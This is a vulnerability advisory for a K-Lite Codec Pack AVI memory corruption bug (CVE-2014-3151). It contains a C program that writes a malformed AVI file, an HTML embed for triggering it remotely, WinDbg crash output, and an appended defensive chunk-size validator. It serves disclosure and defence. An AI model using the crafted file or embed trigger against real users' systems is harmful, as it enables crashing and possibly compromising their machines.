
K-Lite CODEC 9.x Memory Corruption

Posted on 05 May 2014

# Exploit Title: K-Lite Codec Pack version 9.x memory corruption vulnerability
# Date: 2014/05/3
# Author: Aryan Bayaninejad
# Linkedin: https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: http://www.codecguide.com
# Software Link: http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328
# Version: 9.x and prior
# Tested on: Windows XP SP3 32bit and 64bit, Windows 7 32bit and 64bit
# CVE: CVE-2014-3151
# Found by Piece Dumb Fuzzer

details:

K-Lite Codec Pack version 9.x and prior are vulnerable to a memory corruption vulnerability that allows remote attackers to execute arbitrary code and take control of the remote system via a malformed AVI file. Tested with the latest Windows Media Player, Internet Explorer, GOM Player and KMPlayer on Windows XP and Windows 7, x64 and x86.

--------------------------------------------------------------------------------------------------------------------------------------------------

PoC to trigger memory corruption:

```c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* 154-byte malformed AVI: a RIFF/AVI header whose declared sizes do not
 * match the file (RIFF size 0x000A5E44 for a 154-byte file, an INFO list
 * whose chunk "--->" declares size 0xFFFFFFFC), followed by 0x41 filler. */
unsigned char sc[154] = {
    0x52, 0x49, 0x46, 0x46,   /* "RIFF" */
    0x44, 0x5E, 0x0A, 0x00,   /* RIFF size 0x000A5E44 */
    0x41, 0x56, 0x49, 0x20,   /* form type "AVI " */
    0x4C, 0x49, 0x53, 0x54,   /* "LIST" */
    0x7C, 0xFC, 0x00, 0x00,   /* LIST size 0x0000FC7C */
    0x49, 0x4E, 0x46, 0x4F,   /* list type "INFO" */
    0x2D, 0x2D, 0x2D, 0x3E,   /* chunk id "--->" */
    0xFC, 0xFF, 0xFF, 0xFF,   /* chunk size 0xFFFFFFFC */
    /* 122 bytes of 0x41 ('A') filler */
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
};

int main(int argc, char *argv[])
{
    HANDLE fileHandle = INVALID_HANDLE_VALUE;
    DWORD dwBytesWritten = 0;

    /* Narrow-string path, so call the ANSI entry point explicitly; the
     * backslash must be escaped in a C string literal. */
    fileHandle = CreateFileA("d:\\poc.AVI", GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                             CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if (fileHandle == INVALID_HANDLE_VALUE) {
        printf("(-) Failed to Create File\n");
        return 1;
    }
    printf("(+) Writing File ...\n");
    WriteFile(fileHandle, sc, sizeof(sc), &dwBytesWritten, NULL);
    CloseHandle(fileHandle);
    return 0;
}
```

--------------------------------------------------------------------------------------------------------------------------------------------------

PoC to remotely trigger memory corruption (the generated file embedded in a page via the Windows Media Player plugin):

```html
<embed type="application/x-mplayer2"
       pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
       name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false"
       autostart="false" height="330" width="360" loop="false"
       src="D:/PoC.avi" />
```

windbg result:

```text
Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.
```
```text
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 133d0000 1340f000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 57fd0000 57ff7000   C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 031d0000 03206000   C:\Program Files\Common Files\Roxio Shared\9.0\MPEG\RoxioMPEGDemuxer.dll
ModLoad: 03210000 0329b000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\splitter.ax
ModLoad: 02fc0000 02fd7000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkzlib.dll
ModLoad: 032b0000 032bc000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkunicode.dll
ModLoad: 03330000 03350000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
(a20.f58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240 edi=00000044
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!wcsncpy+0x905:
7c910ede 8b39            mov     edi,dword ptr [ecx]  ds:0023:41414141=????????
```
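The register dump shows ecx=41414141 being dereferenced, i.e. the file's 0x41 filler reaches a pointer, and the header that got it there declares sizes that cannot fit the file (RIFF size 0x000A5E44 for a 154-byte file, a chunk size of 0xFFFFFFFC). As an added example, not code from the advisory or from K-Lite, here is a small C check that a file-triage or upload-scanning step could run to reject such RIFF/AVI files before any splitter parses them; `riff_sizes_fit` and `build_sample` are names of my own, and the sample bytes are constructed to match the PoC header.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* RIFF stores sizes little-endian. */
static uint32_t le32(const unsigned char *p) { return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24); }

/* Returns 1 if every chunk size in [p, p+len) fits inside its parent container, 0 at
 * the first that overruns it. RIFF/LIST bodies are recursed after their 4-byte form type. */
static int riff_sizes_fit(const unsigned char *p, size_t len, int depth)
{
    size_t off = 0;
    while (off + 8 <= len) {
        uint32_t size = le32(p + off + 4);
        size_t body = off + 8;
        if (size > len - body) return 0;                  /* overruns parent/file */
        if (!memcmp(p + off, "RIFF", 4) || !memcmp(p + off, "LIST", 4)) {
            if (size < 4 || depth > 16) return 0;         /* no form type, or too deep */
            if (!riff_sizes_fit(p + body + 4, size - 4, depth + 1)) return 0;
        }
        off = body + size + (size & 1);                   /* chunks are word-aligned */
    }
    return 1;
}

/* Constructed sample: the PoC's 32-byte header plus 0x41 filler, 154 bytes.
 * fix=0: as in the PoC. fix=1: RIFF and LIST sizes corrected, so only the "--->"
 * chunk's 0xFFFFFFFC size is wrong. fix=2: every size corrected (well-formed). */
static size_t build_sample(unsigned char out[154], int fix)
{
    static const unsigned char hdr[32] = {
        'R','I','F','F', 0x44,0x5E,0x0A,0x00, 'A','V','I',' ',
        'L','I','S','T', 0x7C,0xFC,0x00,0x00, 'I','N','F','O',
        '-','-','-','>', 0xFC,0xFF,0xFF,0xFF };
    memcpy(out, hdr, 32); memset(out + 32, 0x41, 154 - 32);
    if (fix >= 1) { memset(out + 4, 0, 4);  out[4]  = 154 - 8;   /* RIFF size 146 */
                    memset(out + 16, 0, 4); out[16] = 146 - 12; } /* LIST size 134 */
    if (fix >= 2) { memset(out + 28, 0, 4); out[28] = 134 - 12; } /* "--->" size 122 */
    return 154;
}

int main(void)
{
    unsigned char buf[154];
    for (int fix = 0; fix < 3; fix++) {
        build_sample(buf, fix);
        printf("fix=%d: %s\n", fix, riff_sizes_fit(buf, sizeof buf, 0) ? "chunk sizes fit" : "REJECT: chunk size overruns container");
    }
    return 0;
}
```

The same walk, applied per chunk as a splitter reads them, is the bounds check a parser needs before trusting a declared size for allocation or copying.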

 
